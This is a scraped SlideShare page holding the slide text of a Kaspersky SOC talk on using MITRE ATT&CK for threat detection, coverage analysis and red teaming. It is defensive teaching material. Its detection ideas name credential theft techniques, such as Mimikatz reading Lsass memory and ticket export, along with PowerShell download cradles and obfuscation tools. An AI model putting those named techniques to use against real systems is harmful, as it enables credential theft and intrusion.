Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesSanjay Willie
 

Recently uploaded (20)

From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Visualising and forecasting stocks using Dash
Visualising and forecasting stocks using DashVisualising and forecasting stocks using Dash
Visualising and forecasting stocks using Dash
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your QueriesExploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
Exploring ChatGPT Prompt Hacks To Maximally Optimise Your Queries
 

How MITRE ATT&CK helps security operations

  • 1. Teymur Kheirkhabarov Head of SOC R&D Sergey Soldatov Head of SOC How MITRE ATT&CK helps security operations
  • 2. Who is Sergey ? Since 2016: Head of SOC at Kaspersky lab Internal SOC Commercial MDR* services 2012 – 2016: Chief manager at RN-Inform Rosneft security services insourcing 2002 – 2012: TNK-BP Group IT security integration into business and IT operations Security controls in IT projects Security operations 2001-2002: Software developer at RIPN BMSTU graduate CISA, CISSP * Managed Detection and Response
  • 3. Who is Teymur ? 2016 – : Head of SOC R&D at Kaspersky lab Development: sensors, sensor data, event processing, detection logic, SOC infrastructure SOC R&D team coordination and management 2011 – 2016: Head of Information security IT security integration into business and IT operations Security controls in IT projects Security operations Krasnoyarsk SibSAU graduate
  • 4. Detect layers: David Bianco's pyramid of pain http://detect-respond.blogspot.ru/2013/03/the-pyramid-of-pain.html Commodity Prevention/Detection tools capabilities (can be done automatically) Human Analyst required IoC AM-signature,YaraTTP*-based detect * TTP – tactics techniques and procedures
  • 5. Different approaches to detection 5 Attacker activity IoC-based detection Tool-based detection TTP-based detection Use Mimikatz for dumping authentication data (password/hashes) from memory Search for hashes (MD5/SHA1/SHA256) of utilities that dump credentials Search for files with specific extensions. For example, Mimikatz export Kerberos tickets to .kirbi files, and WCE creates wceaux.dll Search for processes, that access Lsass memory Use of unsigned DLLs, loaded into Lsass process Use PsExec for remote administration Search for hashes (MD5/SHA1/SHA256) of utilities for remote administration Search for installations of services, typical for remote administration utilities. For example, psexec installs service PSEXECSVC Search for remote installation of new service, and then that service starts process C&C communication Search for known C&C (IP/FQDN/URL) Search for User-Agents, typical for particular utilities/malware Search for use of particular DGA, typical for specific utilities/malware Search for periodic network communication Search for communication with randomly generated domain names Search for communication with domains, registered not long ago
  • 6. Tactics, Techniques and Procedures 6 Tactic - the way the threat actor operates during different steps of its operation/campaign. Tactics represent the “why” of an ATT&CK technique. It is the adversary’s tactical objective: the reason for performing an action. Technique – the approach the threat actor uses to facilitate Tactic. Technique represent “how” an adversary achieves a tactical objective by performing an action. For example, and adversary may dump credentials to achieve credential access Procedure - the exact ways a particular adversary or piece of software implements a technique. These are described by the examples sections in ATT&CK techniques Tactic (Why?) Technique (How?) Procedure (Particular implementation)
  • 7. ATT&CK – Adversarial Tactics Techniques and Common Knowledge 7 https://attack.mitre.org/matrices/enterprise/ Tactics Techniques
  • 9. The importance of Procedure 9 For each Technique many Procedures can be introduced There are Procedures that can’t be detected due to technological limitations Not all procedures are yet known
  • 10. What do we detect? Procedure!
  • 11. Where do Procedures can taken? ATT&CK technique description!
  • 12. Good talks in the Internet https://offzone.moscow/speakers /teymur-heirhabarov/ https://2017.zeronights.ru/report/hunting-for-credentials- dumping-in-windows-environment/ https://www.slideshare.net/heirhabarov/ kheirkhabarov24052017phdays7
  • 13. Examples of Techniques and corresponding Procedures T1086: PowerShell 13
  • 14. Examples of Techniques and corresponding Procedures T1086: PowerShell 14 ~ 45 000 PC, last 30 days period
  • 15. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell in autorun 15
  • 16. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell in autorun 16
  • 17. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell suspicious command lines 17 Before adaptation After adaptation
  • 18. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell download cradles 18 https://gist.github.com/HarmJ0y/bb48307ffa663256e239#file-downloadcradles-ps1
  • 19. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell download cradles 19
  • 20. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell obfuscation 20 https://github.com/danielbohannon/Invoke-Obfuscation
  • 21. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell obfuscation 21
  • 22. Examples of Techniques and corresponding Procedures T1086: PowerShell. PowerShell Base64 encoding 22
  • 23. Examples of Techniques and corresponding Procedures T1084: Windows Management Instrumentation Event Subscription 23
  • 24. Examples of Techniques and corresponding Procedures T1084: Windows Management Instrumentation Event Subscription Enumeration of installed ActiveScript consumers Before adaptation After adaptation ~ 146 000 PC, 1 year period Enumeration of installed CommandLine consumers Before adaptation After adaptation
  • 25. Examples of Techniques and corresponding Procedures T1084: Windows Management Instrumentation Event Subscription 25 Malicious CommandLine event consumer
  • 26. Examples of Techniques and corresponding Procedures T1084: Windows Management Instrumentation Event Subscription 26 Malicious ActiveScript event consumer
  • 27. Use case #1: Detects development 27 ATT&CK – one of the good sources of detect ideas Attack emulation Analysis of detection capabilities Required processing Required telemetry Detect development, testing, publication Endless testing in operations Metrics
  • 28. Other sources of detect ideas – TI from operations 28 Public Twitter, blogs, talks, etc. Tests* Private Internal threat research Operations practice Threat hunting** DFIRMA*** Security Assessment/Red teaming * https://attackevals.mitre.org/evaluations.html , for example ** the practice of searching iteratively through data to detect [advanced] threats that evade automatic security solutions *** Digital forensics, Incident response, Malware analysis
  • 29. Use case #1’: Detects development priorities (post-breach) 30 Tactics priorities: Persistence Privilege escalation Defense evasion Credential access Lateral movement Execution … Techniques priorities Available telemetry Used by which APT actors and how they relevant to you? Required investments (~ risk assessment)
  • 30. Use case #2: Detects classification 31 Detects management Understand current coverage • What do we have for each technique*? • Gap analysis Extend coverage • Add new detects? • Update existing? Simplifies R&D team work * Through appropriate Procedure
  • 31. Detects (“Hunts”) mapped to MITRE techniques
  • 32. Use case #3: SOC Analyst’s body of knowledge 33 Attack kill chain (tactics) Known so far attack techniques descriptions Public reports about actual APT campaign linked to used techniques Recommendations on detection and mitigation In addition: • OS architecture • Known attacker’s toolset • Not hypothetical attacks, but taken from practice* * https://reply-to-all.blogspot.com/2013/01/blog-post.html
  • 33. Use case #4: detect rate assessment by ATT&CK coverage 34 Choose scenario (sequence of particular procedures)* Execute in lab and see detects Evaluate based on detection types**: Telemetry Enrichment Behavior detect Now results can be compared*** Can the techniques be considered covered based on the test – the question is open – depends on actual procedures, used in test * https://attackevals.mitre.org/ ** https://attackevals.mitre.org/methodology/detection-categorization.html *** https://reply-to-all.blogspot.com/2018/12/mitre-edr.html
  • 34. MITRE ATT&CK Evaluations Particular Procedures: APT3: 56 Enterprise techniques across 10 tactics “Living off the land”* Focus on “Primary” techniques**, on behavior and not tools and IoCs 2 Scenarios: 10-step with Cobalt Strike + 10 step Empire*** Same lab environment for all vendors Detection categorization Main detection types: • None • Telemery • Indicator of Compromise • Enrichment • General behavior • Specific behavior * https://www.youtube.com/watch?v=j-r6UonEkUw ** Differentiate “Primary” and “Enabling” techniques. “Enabling” - many of the techniques required Command-Line Interface, Execution through API, and PowerShell. In assessment MITRE focused on the Primary technique that was performed, rather than the mechanism of execution (which was considered the Enabling technique) *** https://www.cobaltstrike.com/ ; https://github.com/EmpireProject/Empire Modifiers: • Delayed • Tained • Configuration change
  • 35. BAS: Breach and Attack Simulation METTA https://github.com/uber-common/metta Caldera https://github.com/mitre/caldera Unfetter https://mitre.github.io/unfetter/ Endgame https://github.com/endgameinc/RTA Red Canary - Atomic read team https://github.com/redcanaryco/atomic-red-team Microsoft https://blogs.technet.microsoft.com/motiba/2018/04/09/invoke-adversary-simulating-adversary-operations/
  • 36. KaLaBAS? Existing – vendor specific Not enough tests Need to integrate to existing auto- testing infrastructure
  • 37. Use case #5: Adversary emulation, red teaming 38 Common framework for Red teams, Blue teams and Purple teams collaboration Create adversary emulation scenarios: choose relevant TTP Create red team plan: choose TTPs that might be missed by existing Blue team Gap analysis of current defensive technologies – prioritize future investments SOC operational efficiency (maturity) assessment